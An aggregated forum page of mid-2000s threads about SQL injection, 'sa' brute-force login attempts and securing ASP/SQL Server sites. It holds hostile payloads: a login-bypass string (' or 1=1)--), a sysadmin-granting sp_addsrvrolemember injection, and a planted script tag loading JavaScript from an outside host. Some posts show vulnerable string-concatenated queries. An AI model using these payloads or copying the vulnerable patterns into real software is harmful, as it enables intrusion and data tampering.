SQL Injection Attack
Jul 23, 2005
All,
I am trying to test an attack against a web page. The VBScript runs 2
queries against the database; the first must succeed before the second
runs. Here is the code:
1st-
select * from users where (userid=' + @string + ') and password=' +
@pwdstring + '
2nd-
select * from permissions where userid=' + @string + '
When attempting the attack the problem lies in the "(" & ")"
surrounding the first userid string in the 1st query. if I attempt to
put a ")" in the original @string function to cancel out the first "("
it then causes problems for the second string. Also, the @pwdstring
gets encrypted before it is sent to the SQL Server, so attempting the
attack from that field is useless.
For instance:
@string = ' or 1=1)--
@pwdstring = blank (becomes @pwdstring = 55-12-567-3244-123 due to
encryption)
select * from users where (userid='' or 1=1)--') and
password='55-12-567-3244-123' WORKS OK
select * from permissions where userid='' or 1=1)--' DOES NOT WORK
Is this an instance where the original developers made a happy coding
error (I asked and preventing injection attacks wasn't intended) or is
there something I can do to circumvent this?
Thanks,
josh
View 7 Replies
ADVERTISEMENT
May 8, 2008
Hi,
I need to find out what sql injection attack is, what it does how it is done and how to protect form it....Any through explanation will be much appreciated.
Thanks
Kabir
View 2 Replies
View Related
Aug 18, 2006
hi,
Hope everybody is fine.Well,today I want to know the smartest ways to prevent sql injection attacks.It would be really helpful if anybody gives light to it.
Thanks!!
View 8 Replies
View Related
Jan 19, 2007
Hello all,
I have a question on whether the following stored precedure would be open to an SQL Injection attack. Assume that a string query would be passed to the SP.
I am told that because the password parameter is only varchar(8) that it is safe.
Can someone prove this wrong?
Thanks....
I have added sample code below.
CREATE TABLE [dbo].[JB_Test](
[Name] [varchar](50) COLLATE SQL_Latin1_General_CP1_CI_AS NOT NULL CONSTRAINT [DF_JB_Test_Name] DEFAULT (''),
[Email] [varchar](100) COLLATE SQL_Latin1_General_CP1_CI_AS NOT NULL CONSTRAINT [DF_JB_Test_Email] DEFAULT (''),
[Password] [varchar](8) COLLATE SQL_Latin1_General_CP1_CI_AS NOT NULL CONSTRAINT [DF_JB_Test_Password] DEFAULT (''),
) ON [PRIMARY]
GO
Insert dbo.JB_Test (Name, Email, Password )
values ('John', 'asdf@asdf.com', '2345')
Insert dbo.JB_Test (Name, Email, Password )
values ('Paul', 'asdf@asdf.com', '2345')
Insert dbo.JB_Test (Name, Email, Password )
values ('Geroge', 'asdf@asdf.com', '2345')
Insert dbo.JB_Test (Name, Email, Password )
values ('Ringo', 'asdf@asdf.com', '2345')
GO
Create procedure dbo.JB_Test_Login
@Username varchar(100),
@Password varchar(8)
AS
select Name
from dbo.JB_Test
where Name = @Username
and Password = @Password
GO
--Clean Up Your Mess
--Drop procedure dbo.JB_Test_Login
--GO
--Drop Table dbo.JB_Test
--GO
JBelthoff
• Hosts Station is a Professional Asp Hosting Provider
• Position SEO can provide your company with SEO Services at an affordable price
› As far as myself... I do this for fun!
View 20 Replies
View Related
May 15, 2008
Hi Recently we moved our site from Access to MS SQL Server 2005 Express on a dedicated server. Guess what.... we came under some attack (may be SQL injection). Our database was manipulated and data's in some field were replaced by "<script src=http://9i5t.cn/a.js></script>" We don't know how it was done .. then i googled around to find any clue . too my surprise i found around 30,000 sites which were affected by this / have a look http://www.google.com/search?hl=en&q=%22http%3A%2F%2F9i5t.cn%2Fa.js%22&btnG=SearchAnd also an interest fact popped up also sites where in ASP But unfortunately no documentation was available for it ... So i wonder if their is any flaw in coding or database permission .. 30,000 webmaster can't go wrong. May be their is security flaw either in SQL Server 2005 or ASP .. can't say As of now i have cleared my database using find and replace function. But i know we might me soon be under attack again Please help me out find out exact reason for it .. Thanks in advanceSuraj jain
View 3 Replies
View Related
Oct 22, 2007
Hi to all,
Im looking at the sql server log, and I see a strange behavior.
Im getting at least 5 "sa" login attempts from an sepcific IP address.
How can I avoid this, lock that IP or add a delay to 'sa' failed logins?
Thanks so much
Cristian
View 10 Replies
View Related
Nov 3, 2005
In the Application event log I am seeing entries like the
following:
Login failed for user 'sa'. [CLIENT: 60.32.67.85]
Once
every second.
I am assuming this is a brute force password attack, an
ARIN query of the IP address indicates it's from:
Asia Pacific Network Information CentreIs there any way to block this IP from accessing my server?Thanks,Tylerp.s. I tried posting this on MSDN forums, but the site appears to be broken.
View 1 Replies
View Related
Dec 27, 2006
Hello Every one,
can any one please let me know what is below mentioned errors i found on my newly installed sql server and also let me know severiarity of this and if you know the solution for this i would wel come all your suggestion.
12/24/2006 05:48:47,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:45,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:45,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:44,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:44,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:41,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:41,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:40,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:40,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:40,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:40,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:39,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:39,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:39,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:39,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:35,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:35,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:35,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:35,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:34,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:34,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:34,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:34,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:33,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:33,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:33,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:33,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:32,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:32,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:32,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:32,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:31,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:31,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:31,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:31,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:30,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:30,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:30,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:30,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:29,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:29,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:29,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:29,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:28,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:28,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:27,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:27,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
since last so many days i found that these kind of errors on sql server 2005.It occurs contineously so it keeps server busy all the time.
I have attached a portion of this error log.Thanks for all your help and the time you took to look at my question.
Thanks,
Bharat.
View 1 Replies
View Related
Feb 16, 2005
I like this forum but recently I have noticed they are running ads with sound effects.
I like a lot of programmers I know listen to music through their computer with headphones on all day. Whenever one of those adds fire off it about scares the BeJesus of me and comes through louder than the music. I am playing with my settings but I each time I find one that kills the sound effects it kills the music too.
Starting to make me mad.
View 3 Replies
View Related
Nov 3, 2007
Hi all,
I have a case of sqlslammer.worm virus on my DB server. I have run Mcafee antivirus software but the virus cannot be removed.
Please can anyone tell me how to getit off my server?
Leonard
View 5 Replies
View Related
Jul 4, 2006
This is my code:
CommandText = "SELECT * FROM Products"
If textboxStockID.Text.Length > 0 Then
CommandText = CommandText & " where [StockID] like '%" & textboxStockID.Text & "%'"
End If
Is this subject to the sql injection bug... if so, what changes do I need to make?
Canning
View 2 Replies
View Related
Nov 25, 2007
What is the best way to avoid SQL injection?I know not to do stuff in Visual Basic such as...
Dim objCmd As New SqlCommand("SELECT * FROM mytable where id ='" & Request.QueryString("id") & '" , objConn)As it's best to use stored proceduresIs there any other problems you guys might have had happen to you or other possibilites for attackers that I should know about? Cheers
View 6 Replies
View Related
Jun 5, 2008
I manage a VBSript/ASP/IIS/SQL website for a nonprofit, and our website has been hacked by SQL injections. I have changed the code on the website so it can't access the database, cleaned the database, backed up the database, but now need to find a way to tighten up the security so it won't happen again.
We're a non-profit- so the server is Windows 2000 Terminal SP4 (yeah, I know, it's old, bear with me).
I was using the following code to access the database from the website:
dbconn.open "DSN=cptigers;UID=sqlwebaccess;Password=password" (where cptigers is the name of the DSN connection with SQL server authentication).
So far, I've removed read permission in IIS on the include file that I use to open the database. I've changed the data source to use Windows NT authentication, and set the SQL login MDBCA/cptigers (this is the IIS login) to have public and db_denydatawriter roles.
But I'm not sure how to call this database connection in the code (how do you define the IIS user and password?), and not sure if this is sufficient to protect from future SQL injections.
Am I heading the right direction? Thanks, Amanda
View 4 Replies
View Related
Jun 16, 2005
Hi All:I can't seem to get this thing work... When I type this in a textbox : '; exec master.dbo.sp_addsrvrolemember 'redice','sysadmin' -- , there's no respond, I mean, I check redice's role, but the System Administrators is not checked.Any idea about this?Thanks in advance.
View 11 Replies
View Related
Jul 21, 2005
Hi All,
First explain the SQL Injection and how it working and second what is the Solution of SQL Injection..... ?
Thanx,
Shally
View 2 Replies
View Related
Aug 14, 2004
Hi there !
Can anyone put some more lights on SQL Injection ? Is there anyway to get rid of it ? If yes then please let me know ?
With Thanks !
sqlboy
View 5 Replies
View Related
Jan 30, 2006
Does anyone have any insight regarding SQL injection involving a table name t_jiaozhu? Is this a new hack script or old? I am having a hard time finding any clear details other than ways to stop injection from happening. This I know, what I am trying to figure out is what damaged may have been caused (worse case) and what would be a good plan of attack to figure out what steps suceeded/failed.
View 1 Replies
View Related
Mar 25, 2008
I have a windows 2003 server with SQL Express 2005. The server has about 15 websites and uses ASP
Hackers somehow are creating NT Administrator Users on the server and then logging in with Terminal Services.
I ran thru SQL injection and tried to stop these attacks by stopping keywords in the SQL, but they still happen
Can anyone help, I really cant afford to pay for a security analyst so any advice would be nice.
How are these guys creating users?
thanks
Nick
View 7 Replies
View Related
Mar 13, 2008
Hi there. I use MS Enterprise library to get access to my MSSQL database. All actions are performed by stored procedures. Should I check the input parameters for "bad" symbols such as ' or union words or the library do all this for me? Thanks.
View 3 Replies
View Related
Nov 21, 2006
What is SQL Injection? Can any body explain it briefly?
View 1 Replies
View Related
Jan 15, 2007
Am looking for SQL injection automation tool,can anybody suggest a tool which will be helpful.
View 8 Replies
View Related
Jul 29, 2006
I want to inject a "where" criteria parametrically, but I can't get this to work:
CREATE PROCEDURE dbo.CopyTestCases
@Criteria varchar(255)
AS
declare @t table(NID int not null);
set transaction isolation level serializable;
begin tran;
insert into TestIT (Product,CatID,Category,Title)
output inserted.TestID into @t( NID)
select Product,CatID,Category,Title
from TestIT where @Criteria order by TestID;
commit;
GO
I get the message "An expression of non-boolean type specified in a context where a condition is expected". How do I fix this?
View 6 Replies
View Related
Jan 24, 2008
I haven't been able to get a clear-cut answer on this so I decided to ask here.
I have developed a web application that is used as a front-end to many SQL reports using report viewer.
The authentication on the front end uses a stored procedure to match the login name and password.
However, many of my reports do NOT use stored procedures. They are just standard text queries.
Is this secure? I don't know much about SQL Injection. Could an attacker see
all of the data in the database?
View 1 Replies
View Related
Apr 9, 2008
A new take on my question from yesterday:
Does RS do any checks for SQL Injection attacks or is that entirely up to the developer?
i.e. if I have a report that uses dynamic SQL and pass in parameters via the web service are these parameters checked in any way?
View 5 Replies
View Related
Jun 18, 2006
Hi, i have a big question about SQL injections,Im deploying a web site, and im using strore procedures, the store procedures recives the query parameters and then execute the query, that i already defined in them.I pass the store procedure´s name and their parameters via a sql statement adding the parameters to the string chain. The string chain is something like this: string sql = ("EXEC sp_StoreProcedure1 ' " + param1 + " ' + ' " paramN" ' )i define the store procedure´s name and the parameters in the string, and then i send the string to execute.My questions are,is there some kind of potential issue or attack that it can happens if i made the queries in this way?? is my database secure of sql injections just beacuse the use of store procedures???thanks for ur answers! ill appreciate them a lot
View 2 Replies
View Related
Jun 28, 2006
Alright, so I have a basic search function to look through a field in my database which is decided by a query string. <asp:SqlDataSource ID="SqlDataSource1" runat="server" ConnectionString="<%$ ConnectionStrings:DatabaseConnectionString %>"
SelectCommand="SELECT * FROM [Employee] WHERE ([Responsibilities] LIKE '%' + @Responsibilities + '%')"> <SelectParameters> <asp:QueryStringParameter Name="Responsibilities" QueryStringField="q" Type="String" /> </SelectParameters> </asp:SqlDataSource> But, I'd really like to fix it using parameterized SQL queries, so that people aren't dropping my tables. >_>I've been lookin' around for some code on how to do this in C#.NET, and most of them seem to look like this: SqlConnection objConnection = new SqlConnection(_ConnectionString);objConnection.Open();SqlCommand objCommand = new SqlCommand( "SELECT * FROM User WHERE Name = @Name AND Password = @Password", objConnection);objCommand.Parameters.Add("@Name", NameTextBox.Text);objCommand.Parameters.Add("@Password", PasswordTextBox.Text);SqlDataReader objReader = objCommand.ExecuteReader(); My problem is that I don't know how really know how to go from my code to this code... I mean, would I throw the latter in my backend code and call what it returns as a string, would I entirely replace my Datasource and do soemthin' with the code? Any help, in the form of tutorials or just straight up tellin' me here, would be greatly appreciated.Thanks. =D
View 3 Replies
View Related
Nov 10, 2006
Hi everyone,it is the first time i try to do the sql injection. and i got the problem for the following code. Dim strSQL as String = ""Dim objConnection as New oleDBConnection(getConnectionString("image check list"))strSQL = " insert into tblTest (id, text) value ( 1, @Text)"cmdSelect.Parameters.Add(New SQLParameter("@Text", "abc"))Dim objDataAdapter As New oleDBDataAdapter(strSQL, objConnection)Dim objDS As New DataSet()objDataAdapter = NothingobjDS = Nothingthe exception said i have problem in "cmdSelect".i am using SQlServer as the data store.http://aspnet101.com/aspnet101/tutorials.aspx?id=1 => this is the reference site i read.Anyone can help?thanks a lot!
View 5 Replies
View Related
Jan 21, 2007
I am building my first ASP.Net app from scratch and while working on the DAL I came across the problem of SQL Injection. I searched on the web and read different articles but I am still unsure about the answer. My question is should I add
db.AddInParameter(dbCommand, "AvatarImageID", DbType.Int32, avatarImageID);
Add in Parameters to my C# code to avoid SQL Injection. What is the best practice. I am unclear if the stored procedure already helps me avoid SQl Injection or if I need the add in parameters in the C# methods to make it work. I need some help. Thanks, Newbie
My C# update method in the DAL (still working on the code)
private static bool Update(AvatarImageInfo avatarImage)
{
//Invoke a SQL command and return true if the update was successful.
db.ExecuteNonQuery("syl_AvatarImageUpdate",
avatarImage.AvatarImageID,
avatarImage.DateAdded,
avatarImage.ImageName,
avatarImage.ImagePath,
avatarImage.IsApproved);
return true;
}
I am using stored procedures to access the data in the database.
My update stored proc
set ANSI_NULLS ON
set QUOTED_IDENTIFIER ON
GO
ALTER PROCEDURE [dbo].[syl_AvatarImageUpdate]
@AvatarImageID int,
@DateAdded datetime,
@ImageName nvarchar(64),
@ImagePath nvarchar(64),
@IsApproved bit
AS
BEGIN
-- SET NOCOUNT ON added to prevent extra result sets from
-- interfering with SELECT statements.
SET NOCOUNT ON;
BEGIN TRY
UPDATE [syl_AvatarImages]
SET
[DateAdded] = @DateAdded,
[ImageName] = @ImageName,
[ImagePath] = @ImagePath,
[IsApproved] = @IsApproved
WHERE [AvatarImageID] = @AvatarImageID
RETURN
END TRY
BEGIN CATCH
--Execute LogError SP
EXECUTE [dbo].[syl_LogError];
--Being in a Catch Block indicates failure.
--Force RETURN to -1 for consistency (other return values are generated, such as -6).
RETURN -1
END CATCH
END
View 2 Replies
View Related
May 1, 2007
Hello, Our Security specialist, is running an audit on one of my systems. All pages pass except the login page. It keeps saying I am getting hit with a SQL injection attack. I filter out special characters, both on the Client Side validation and the server side.It is only the one page I have is failing, and I am beginning to wonder if it is producing false positives.Protected Sub btnLogin_Click(ByVal sender As Object, ByVal e As System.EventArgs) Handles btnLogin.Click If Not Page.IsValid Then
lblError.Text = "Page Invalid"
Exit Sub End If Dim strMesage As String = ""
If Not IsInputSanitized(strMesage) Then
lblError.Text = strMesage
Exit Sub End If If Not ValueIsValid(txtUserName.Value.Trim) Then
lblError.Text = Globals.Message_InvalidCharacters
Exit Sub End If Public Function IsInputSanitized(ByRef p_strReturnMessage As String) As Boolean Dim loop1 As Integer Dim arr1() As String Dim coll As NameValueCollection Dim regexp As String = "^([^<>" & Chr(34) & "\%;)(&+]*)$"
Dim reg As Regex = New Regex(regexp) coll = Request.Form arr1 = coll.AllKeys 'Start at 1 so you will skip over the __VIEWSTATE
For loop1 = 0 To UBound(arr1) 'Skip over the ASPNET-generated controls as they will give a false positive.
If Left(coll.AllKeys(loop1), 2) <> "__" Then If Not reg.IsMatch(Request(arr1(loop1))) Then
p_strReturnMessage = Globals.Message_InvalidCharacters
Return False End If End If Next loop1 'If it never hit false retrun true
p_strReturnMessage = "Success"
Return True End Function If Not ValueIsValid(txtPassword.Value.Trim) Then
lblError.Text = Globals.Message_InvalidCharacters
Exit Sub End If If Not ValidateUser(txtUserName.Value.Trim, txtPassword.Value.Trim) Then
lblError.Text = Globals.Message_LoginInvalid
End If End Sub Here are the other validation routines 'This is a check to make sure that the String Values Entered into the Database field 'are indeed valid and without characters that can be used in injection attacks
Function ValueIsValid(ByVal p_Input As String) As Boolean Dim strIn As String = p_Input Dim x As Integer Dim A As String Dim l_Return As Boolean = True For x = 1 To Len(strIn) A = Mid(strIn, x, 1) 'Check each character in the string individually
If InStr("<>+%|?;()", A) <> 0 Then 'If this is not a "Bad" character
l_Return = False 'tack it onto the output string
End If Next Return l_Return End Function
View 8 Replies
View Related
Jul 3, 2007
Hello,
I am building a website in ASP.net 2.0 and I want to protect my self from sql Injection.
I am half way there in that I have built my own class that I use to check any input to the Database from a textbox (or user input) for specific characters that cause trouble, such as the “ ‘ � or “;� it then converts them to my own code for example “ ’ � = |^| the same function will convert my “code� back to the original character which works great until I get to Gridviews and Forum View.
Does anyone know how I would access the class I created through the gridview and formview so that any info they display gets first translated through my class.
Or if that is not possible how I would set the grideview or formview to translate the “codes� for me.
If I am totally off track here and there is a much better way to do all this then I am all ears. Please keep in mind I will require the “bad� characters to be saved in some way shape or form.
Thanks
View 3 Replies
View Related
Oct 25, 2007
I have become a big fan of the datasets in Visual Studio 2005. I usually create the SQL for each method in the table adapter; however, I am wondering if there is any 'built-in' functions in the C files for sql injection prevention? I have read that using stored procedures is a good method for prevention. Should I be using SP rather than SQL within my methods in the data table?
View 5 Replies
View Related
Jan 2, 2008
One night over the last week someone successfully found a hole in a line of code in an ASP.NET website and was able to run an injection script against our database. I know, I know, stupid stupid stupid of us, but the breach was in an old app and an old database that we hadn't really taken a look at in a while, hence the one hole they found. This script from what I can tell was able to get a list of the databases on the server and attempted to iterate through all of them. The login they seized only had permissions for two db's so that's all they could access, but I'm still very scared about what they could have done with that login. I don't see any data loss, but they definitely dumped the contents of all tables, some of which contained some sensitive information. That information was encrypted but I'm not sure how much better that makes me feel.
So my questions
1) Since the user account they seized was the DBO on the database, what types of things might they have been able to do in the hour or so they were poking around other than run select statements. I know the account had update and delete permissions, although they didn't delete anything. My guess is they didn't want to tip us that they were in so they left the data intact.
2) How should we investigate the health of the DB and the server, to make sure they didn’t insert any scripts that are monitoring or reporting on data.
3) With DBO login access could they have messed with any system tables or settings?
4) Would DBO access allow them to read DB passwords? We’ve changed all of them already but I’m still concerned.
OK, so I’ll stop asking questions because obviously any help you can provide would be awesome.
Thanks so much.
View 16 Replies
View Related
Jan 18, 2008
My website im working on lets ppl post stuff about them self and what not. How would guard against them from trying drop tables and what not
View 5 Replies
View Related
